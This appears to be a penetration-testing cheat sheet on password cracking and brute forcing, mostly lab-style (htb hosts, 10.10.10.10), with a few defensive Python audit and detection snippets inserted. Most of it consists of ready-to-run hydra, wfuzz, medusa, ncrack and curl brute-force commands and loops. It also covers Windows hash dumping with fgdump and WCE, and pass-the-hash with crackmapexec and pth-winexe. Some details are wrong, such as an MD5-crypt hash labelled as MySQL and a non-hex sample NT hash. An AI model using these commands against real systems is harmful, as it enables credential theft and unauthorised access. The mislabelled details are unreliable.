
Password Cracking



Good Post: Bruteforcing using Custom Scripts
Crunch:
crunch 8 8 -t <pattern_of_8_characters> -o list.txt

if you want to create something like Bha!!123

crunch 8 8 -t ,@@^^%%%

, = upper case letter
@ = lower case letter
^ = special character
% = number
Generating Wordlist using kwprocessor

this generates keyboard-walk passwords: sequences of adjacent keys that users type as a streak across the keyboard
example: qwertyuiop[]\

git clone https://github.com/hashcat/kwprocessor.git

#Create a wordlist of keyboard walks from the routes users typically take across the keyboard
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages
wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 

#hide 404 responses; -b --> status codes to blacklist (default 404), -s --> status codes to show (dir mode takes the base URL, no FUZZ keyword)
gobuster dir --url http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors
gobuster fuzz -k --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing using dirsearch 
dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404

Fuzzing Webpages using bash

#generates a list of URLs with id=1..10000 that can be fed to a fuzzer
for id in $(seq 1 10000); do echo "http://www.xyz.com/index.php?id=$id"; done
Bruteforcing kerberos 

Links: GitHub username wordlists, Kerbrute on GitHub

./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193 
Subdomain Brute Force

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

*All Wordlists are from SecLists


First check the response for a non-existent subdomain; if it is, say, 28 words long, hide every response with 28 words (--hw 28) so only the responses that differ are shown

wfuzz --hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

add the discovered hostnames to /etc/hosts
SubDomain Bruteforce using wfuzz

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "HOST:FUZZ.bhanu.notes" -u http://10.10.10.10/ --hc 400,301 -t 50 -c
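The detection side of the directory and vhost fuzzing above, as an added Python example (not code from this page): it parses Apache vhost_combined access-log lines and flags client IPs with a high 404/403 ratio, many distinct Host headers, or the default wfuzz/gobuster User-Agent. The log lines are constructed, and the User-Agent prefixes are assumed defaults that the tools let a user override.

```python
import re
from collections import defaultdict

# Apache vhost_combined layout: vhost:port client - - [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<vhost>[^: ]+)(?::\d+)? (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_fuzzing(lines, min_requests=20, miss_ratio=0.8, max_vhosts=5):
    """Flag client IPs whose traffic looks like directory or vhost brute forcing."""
    per_ip = defaultdict(lambda: {"total": 0, "miss": 0, "vhosts": set(), "uas": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line: skip it rather than abort the whole run
        s = per_ip[rec["ip"]]
        s["total"] += 1
        s["miss"] += rec["status"] in ("404", "403")
        s["vhosts"].add(rec["vhost"])
        s["uas"].add(rec["ua"])
    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["total"] >= min_requests and s["miss"] / s["total"] >= miss_ratio:
            reasons.append("high 404/403 ratio: directory fuzzing")
        if len(s["vhosts"]) >= max_vhosts:
            reasons.append("many distinct Host headers: vhost fuzzing")
        # Default User-Agent prefixes of wfuzz and gobuster (assumption; both tools let you override it)
        if any(ua.startswith(("Wfuzz/", "gobuster/")) for ua in s["uas"]):
            reasons.append("fuzzer user-agent")
        if reasons:
            findings[ip] = reasons
    return findings

# Constructed sample traffic (not real logs): a directory fuzzer, a vhost fuzzer and a normal client
def _line(vhost, ip, path, status, ua):
    return (f'{vhost}:80 {ip} - - [10/Oct/2023:10:00:00 +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

SAMPLE_LINES = (
    [_line("redcross.htb", "10.0.0.5", f"/admin/word{i}.php", 404, "Wfuzz/3.1.0") for i in range(24)]
    + [_line("redcross.htb", "10.0.0.5", "/admin/login.php", 200, "Wfuzz/3.1.0")]
    + [_line(f"sub{i}.redcross.htb", "10.0.0.6", "/", 400, "Mozilla/5.0") for i in range(8)]
    + [_line("redcross.htb", "10.0.0.7", "/index.php", 200, "Mozilla/5.0") for _ in range(5)]
)
```

Calling detect_fuzzing(SAMPLE_LINES) reports 10.0.0.5 and 10.0.0.6 and stays silent on the normal client; tune the thresholds to the site's real baseline before alerting on them.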
Cracking Http-Digest Auth

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-digest /path/
Fuzzing using Wget 

#do not download files with these extensions (-R = reject list); -nd = no directory tree, -r = recursive, -P = directory to save into
wget -nd -r -R html,asp,php,aspx -P wordlist.txt hackingdream.net

#download only files with these extensions (-A = accept list)
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt hackingdream.net
Cewl for emails in the webpage

cewl -n -e http://10.10.10.10 > emails.txt
Brute Forcing KeePass

keepass2john keypass.kdbx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Bruteforcing Passwords - POST Using WFuzz

Intercept the admin login request after entering a username and password, and copy the form data from the request body

or

Firefox --> go to the login page --> hit F12 --> Network tab --> enter creds --> submit --> select the POST request in the Network tab
--> Headers tab --> click "Resend" and select "Edit and Resend" --> the request body is shown there
use it for the -d option

wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt

Reference

Bruteforcing Passwords - POST Using WFuzz

wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -d "user=admin&password=FUZZ" -z file,rockyou.txt

wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401

Cheatsheet, Cheatsheet-2
Brute Forcing Passwords using Curl
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass"; echo "$pass"; done

-------------------------------------------------------

#!/bin/bash
# Usage: ./script <input-file>   (one "user password" pair per line)
if [ $# -ne 1 ]; then
    echo "Usage: ./script <input-file>"
    exit 1
fi

while read -r user pass; do
    # --fail makes curl exit non-zero on an HTTP error, so the exit status tells us whether the login was accepted
    if curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login >/dev/null 2>&1; then
        echo "ok: $user"
    else
        echo "failed: $user"
    fi
done < "$1"

-----------------------------------------

url="http://foo.dev/login"
# userlist_gen and passlist_gen stand for whatever produces the candidate lists
for user in $(userlist_gen); do
    for pass in $(passlist_gen); do
        http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s)
        if [[ $http_code -eq 302 ]]; then
            echo "Success: User: '$user' Pass: '$pass'"
            break 2
        fi
    done
done

-------------------------------------------- WORKS GOOD ------------------------------------------

url="https://172.23.161.130/console"
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
    http_code=$(curl -k "$url" -u root:"$pass" -w '%{http_code}' -o /dev/null -s)
    if [[ $http_code -ne 401 ]]; then
        echo "Success: User: root, Pass: '$pass'"
        break
    else
        echo "Wrong Password root:$pass"
    fi
done
WPSCAN:

wpscan --url http://192.168.0.107 -P Wordlist.txt -U wordlist.txt -t 20

wpscan --url http://10.40.10.10/ -e ap,t,u 
Hydra:

hydra -l admin -P wordlist.txt -v VICTIM_IP ftp

hydra -l username -P password_file.txt -s port -f ip_address request_method /path
hydra -l admin -P 1000_common_passwords.txt -s 8080 -f 10.10.10.10 http-get /index.html


For Wordpress:

hydra -L wordlist.txt -P wordlist.txt -V 192.168.0.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:invalid'

hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator

patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401

Cracking a PuTTY Private Key (.ppk)

sudo apt install putty-tools

#Generate id_rsa for SSH login; if it asks for a passphrase, the key passphrase needs to be cracked first
puttygen private.ppk -O private-openssh -o id_rsa

putty2john private.ppk > hash

john --format=PuTTY --fork=4 hash --wordlist=wordlist.txt


#Re-run the conversion and enter the cracked passphrase
puttygen private.ppk -O private-openssh -o id_rsa

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John

#the recovery key is 8 groups of 6 digits separated by dashes, so a mask covers the whole keyspace
john --format=bitlocker-opencl --mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hash

you can also use bitcracker

Cracking Recovery key with JTR

PWDUMP/fgdump: Used to dump Windows password hashes; needs admin privileges to work.

just run fgdump.exe in cmd and the hashes get dumped into a text file.
/etc/shadow Hashes 

if the hashes start with:

$1$         - MD5
_           - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$         - SHA-256
$6$         - SHA-512
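An added Python example (not from this page) that turns the prefix table above into a shadow-file audit: it classifies each entry by the algorithm its prefix indicates and flags the schemes a defender should migrate away from. The sample entries are constructed with fake hash values.

```python
import re

# Hash prefix -> (algorithm, weak). Weak schemes should be migrated (e.g. to SHA-512 or bcrypt).
PREFIXES = [
    ("$1$", "MD5", True),
    ("$2", "Blowfish (bcrypt)", False),   # $2$, $2a$, $2b$, $2y$ variants
    ("$5$", "SHA-256", False),
    ("$6$", "SHA-512", False),
    ("_", "BSDi Extended DES", True),
]
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")  # traditional DES crypt: 13 chars, no prefix at all

def identify(hash_field):
    """Return (algorithm name, is_weak) for the second field of a shadow entry."""
    if hash_field == "":
        return ("empty (no password)", True)
    if hash_field[0] in "!*":
        return ("locked", False)
    for prefix, name, weak in PREFIXES:
        if hash_field.startswith(prefix):
            return (name, weak)
    if DES_RE.fullmatch(hash_field):
        return ("traditional DES", True)
    return ("unknown", True)  # unrecognised scheme: review by hand, treat as weak

def audit_shadow(text):
    """Return (user, algorithm, is_weak) for every entry in shadow-formatted text."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if not line.strip() or line.startswith("#") or len(fields) < 2:
            continue
        algo, weak = identify(fields[1])
        findings.append((fields[0], algo, weak))
    return findings

# Constructed sample entries with fake hash values (not from a real system)
SAMPLE_SHADOW = """\
root:$6$fakeSalt$fakeHashValueOnlyForTheExample0123456789abcdefghijklmnopqrstuvwxyz:19600:0:99999:7:::
legacy:$1$fake$0123456789abcdefghijklm:19600:0:99999:7:::
svc:!:19600:0:99999:7:::
guest::19600:0:99999:7:::
"""

if __name__ == "__main__":
    for user, algo, weak in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:10} {algo:22} {'WEAK' if weak else 'ok'}")
```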
Windows Credential Editor(WCE): 

wce64.exe -w
Passing the Hash to login to windows:

pth-winexe

export SMBHASH=Copy_the_LM:NTLM_Hash_FROM_fgdump

pth-winexe -U administrator% //Victim_IP cmd

Pass the Password

crackmapexec IP_Address -u username -d domain_name -p password

crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1


Pass the Hash
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243::  #copy the last hash (the NT hash)

crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local 
Password Profiling: 

Creating Wordlists from a webpage or any source.

cewl www.website.com -m 6 -w /root/wordlist-cewl.txt
Password Mutation:

nano /etc/john/john.conf
#under [List.Rules:Wordlist] add a rule that appends two digits to each word:
$[0-9]$[0-9]

#apply the rules to the existing wordlist and write out the mutated candidates
john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:

ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
        #CL=1 limits ncrack to one connection at a time; RDP does not cope with multiple parallel connections
LM and NTLM Hashes:
-------------------
Windows NT-based systems up to Server 2003 stored two different hashes of each password: the LAN Manager (LM) hash and the NT LAN Manager (NTLM) hash.

LM Hashing: weak; a password longer than 7 characters is split into two 7-character halves
-----------
the password is converted to uppercase before being hashed, and each half is hashed separately,
with no salt --> prone to rainbow table attacks

NTLM Hashing: the default from Windows Vista onwards; stored in the SAM
--------------
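Because of the weaknesses described above, a stored LM hash is a finding in its own right. An added Python example (not from this page) that parses pwdump/fgdump-style lines like the one in the Pass the Hash section and reports accounts that still carry an LM hash or have an empty password; the empty-password hash constants are the well-known published values, and the sample dump is constructed with fake hashes.

```python
# Hashes of the empty password in pwdump output (well-known published constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def is_hex32(s):
    """True for a 32-character lowercase hex string (the length of an LM or NT hash)."""
    return len(s) == 32 and all(c in "0123456789abcdef" for c in s)

def parse_pwdump_line(line):
    """Parse 'user:rid:lmhash:nthash:::' into a dict; raises ValueError on malformed input."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a pwdump line: {line!r}")
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}

def audit_pwdump(text):
    """Return (user, finding) pairs for accounts with a stored LM hash or an empty password."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_pwdump_line(line)
        # A real LM hash means the password was uppercased and split into two 7-char halves
        # that crack independently, so storing one at all is the finding.
        if is_hex32(rec["lm"]) and rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored (NoLMHash policy not enforced)"))
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "empty password"))
    return findings

# Constructed sample dump (fake hash values, no real accounts)
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for user, finding in audit_pwdump(SAMPLE_DUMP):
        print(f"{user}: {finding}")
```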